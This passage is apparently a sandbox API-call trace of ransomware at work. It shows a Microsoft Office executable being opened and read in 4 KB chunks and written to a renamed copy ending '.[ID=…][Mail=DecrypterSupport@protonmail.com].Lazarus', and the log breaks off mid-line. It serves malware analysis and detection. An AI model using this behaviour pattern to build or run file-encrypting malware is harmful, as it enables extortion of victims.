SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0093.100] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0093.100] CloseHandle (hObject=0x418) returned 1 [0093.100] AreFileApisANSI () returned 1 [0093.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0093.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85580 [0093.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0093.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0093.100] GetFileType (hFile=0x418) returned 0x1 [0093.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0093.100] CloseHandle (hObject=0x418) returned 1 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0093.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0093.102] AreFileApisANSI () returned 1 [0093.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85d00 [0093.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d210, cbMultiByte=-1, lpWideCharStr=0x85d00, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0093.102] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9e226c00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x406d8)) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85d00 | out: hHeap=0x20000) returned 1 [0093.102] AreFileApisANSI () returned 1 [0093.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0093.102] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0093.102] GetLastError () returned 0x0 [0093.102] SetLastError (dwErrCode=0x0) [0093.102] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0093.103] GetLastError () returned 0x0 [0093.103] SetLastError (dwErrCode=0x0) [0093.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a3b0 [0093.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0093.103] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0093.103] AreFileApisANSI () returned 1 [0093.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 137 [0093.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x112) returned 0x92260 [0093.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x92260, cchWideChar=137 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 137 [0093.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0093.104] GetFileType (hFile=0x418) returned 0x1 [0093.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92260 | out: hHeap=0x20000) returned 1 [0093.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0093.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0093.104] AreFileApisANSI () returned 1 [0093.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0093.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x856c0 [0093.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe") returned 75 [0093.104] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVShNotify.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvshnotify.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0093.104] GetFileType (hFile=0x33c) returned 0x1 [0093.104] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0093.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0093.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0093.104] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0093.105] GetLastError () returned 0x0 [0093.105] SetLastError (dwErrCode=0x0) [0093.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0093.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0093.105] GetLastError () returned 0x0 [0093.105] SetLastError (dwErrCode=0x0) [0093.105] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0093.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0093.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0093.105] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0093.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0093.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0093.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0093.287] GetLastError () returned 0x0 [0093.287] SetLastError (dwErrCode=0x0) [0093.287] GetLastError () returned 0x0 [0093.287] SetLastError (dwErrCode=0x0) [0093.287] GetLastError () returned 0x0 [0093.287] SetLastError (dwErrCode=0x0) [0093.288] GetLastError () returned 0x0 [0093.288] SetLastError (dwErrCode=0x0) [0093.288] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.290] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.370] GetLastError () returned 0x0 [0093.370] SetLastError (dwErrCode=0x0) [0093.370] GetLastError () returned 0x0 [0093.370] SetLastError (dwErrCode=0x0) [0093.370] GetLastError () returned 0x0 [0093.370] SetLastError (dwErrCode=0x0) [0093.370] GetLastError () returned 0x0 [0093.370] SetLastError (dwErrCode=0x0) [0093.370] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.370] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.371] GetLastError () returned 0x0 [0093.371] SetLastError (dwErrCode=0x0) [0093.371] GetLastError () returned 0x0 [0093.371] SetLastError (dwErrCode=0x0) [0093.371] GetLastError () returned 0x0 [0093.371] SetLastError (dwErrCode=0x0) [0093.371] GetLastError () returned 0x0 [0093.371] SetLastError (dwErrCode=0x0) [0093.371] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.371] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.372] GetLastError () returned 0x0 [0093.372] SetLastError (dwErrCode=0x0) [0093.372] GetLastError () returned 0x0 [0093.372] SetLastError (dwErrCode=0x0) [0093.372] GetLastError () returned 0x0 [0093.372] SetLastError (dwErrCode=0x0) [0093.372] GetLastError () returned 0x0 [0093.372] SetLastError (dwErrCode=0x0) [0093.372] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.372] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.372] GetLastError () returned 0x0 [0093.372] SetLastError (dwErrCode=0x0) [0093.373] GetLastError () returned 0x0 [0093.373] SetLastError (dwErrCode=0x0) [0093.373] GetLastError () returned 0x0 [0093.373] SetLastError (dwErrCode=0x0) [0093.373] GetLastError () returned 0x0 [0093.373] SetLastError (dwErrCode=0x0) [0093.373] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.373] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.373] GetLastError () returned 0x0 [0093.373] SetLastError (dwErrCode=0x0) [0093.373] GetLastError () returned 0x0 [0093.373] SetLastError (dwErrCode=0x0) [0093.374] GetLastError () returned 0x0 [0093.374] SetLastError (dwErrCode=0x0) [0093.374] GetLastError () returned 0x0 [0093.374] SetLastError (dwErrCode=0x0) [0093.374] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.374] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.374] GetLastError () returned 0x0 [0093.374] SetLastError (dwErrCode=0x0) [0093.374] GetLastError () returned 0x0 [0093.374] SetLastError (dwErrCode=0x0) [0093.374] GetLastError () returned 0x0 [0093.374] SetLastError (dwErrCode=0x0) [0093.375] GetLastError () returned 0x0 [0093.375] SetLastError (dwErrCode=0x0) [0093.375] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.375] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.375] GetLastError () returned 0x0 [0093.375] SetLastError (dwErrCode=0x0) [0093.375] GetLastError () returned 0x0 [0093.375] SetLastError (dwErrCode=0x0) [0093.375] GetLastError () returned 0x0 [0093.375] SetLastError (dwErrCode=0x0) [0093.375] GetLastError () returned 0x0 [0093.375] SetLastError (dwErrCode=0x0) [0093.376] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.376] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.376] GetLastError () returned 0x0 [0093.376] SetLastError (dwErrCode=0x0) [0093.376] GetLastError () returned 0x0 [0093.376] SetLastError (dwErrCode=0x0) [0093.376] GetLastError () returned 0x0 [0093.376] SetLastError (dwErrCode=0x0) [0093.376] GetLastError () returned 0x0 [0093.376] SetLastError (dwErrCode=0x0) [0093.376] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.377] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.377] GetLastError () returned 0x0 [0093.377] SetLastError (dwErrCode=0x0) [0093.377] GetLastError () returned 0x0 [0093.377] SetLastError (dwErrCode=0x0) [0093.377] GetLastError () returned 0x0 [0093.377] SetLastError (dwErrCode=0x0) [0093.377] GetLastError () returned 0x0 [0093.377] SetLastError (dwErrCode=0x0) [0093.377] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.378] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.378] GetLastError () returned 0x0 [0093.378] SetLastError (dwErrCode=0x0) [0093.378] GetLastError () returned 0x0 [0093.378] SetLastError (dwErrCode=0x0) [0093.378] GetLastError () returned 0x0 [0093.378] SetLastError (dwErrCode=0x0) [0093.378] GetLastError () returned 0x0 [0093.378] SetLastError (dwErrCode=0x0) [0093.378] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.378] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.379] GetLastError () returned 0x0 [0093.379] SetLastError (dwErrCode=0x0) [0093.379] GetLastError () returned 0x0 [0093.379] SetLastError (dwErrCode=0x0) [0093.379] GetLastError () returned 0x0 [0093.379] SetLastError (dwErrCode=0x0) [0093.379] GetLastError () returned 0x0 [0093.379] SetLastError (dwErrCode=0x0) [0093.379] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.379] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.380] GetLastError () returned 0x0 [0093.380] SetLastError (dwErrCode=0x0) [0093.380] GetLastError () returned 0x0 [0093.380] SetLastError (dwErrCode=0x0) [0093.380] GetLastError () returned 0x0 [0093.380] SetLastError (dwErrCode=0x0) [0093.380] GetLastError () returned 0x0 [0093.380] SetLastError (dwErrCode=0x0) [0093.380] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.380] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.380] GetLastError () returned 0x0 [0093.380] SetLastError (dwErrCode=0x0) [0093.381] GetLastError () returned 0x0 [0093.381] SetLastError (dwErrCode=0x0) [0093.381] GetLastError () returned 0x0 [0093.381] SetLastError (dwErrCode=0x0) [0093.381] GetLastError () returned 0x0 [0093.381] SetLastError (dwErrCode=0x0) [0093.381] ReadFile (in: hFile=0x33c, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.381] WriteFile (in: hFile=0x418, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.383] GetLastError () returned 0x0 [0093.383] SetLastError (dwErrCode=0x0) [0093.383] GetLastError () returned 0x0 [0093.383] SetLastError (dwErrCode=0x0) [0093.383] GetLastError () returned 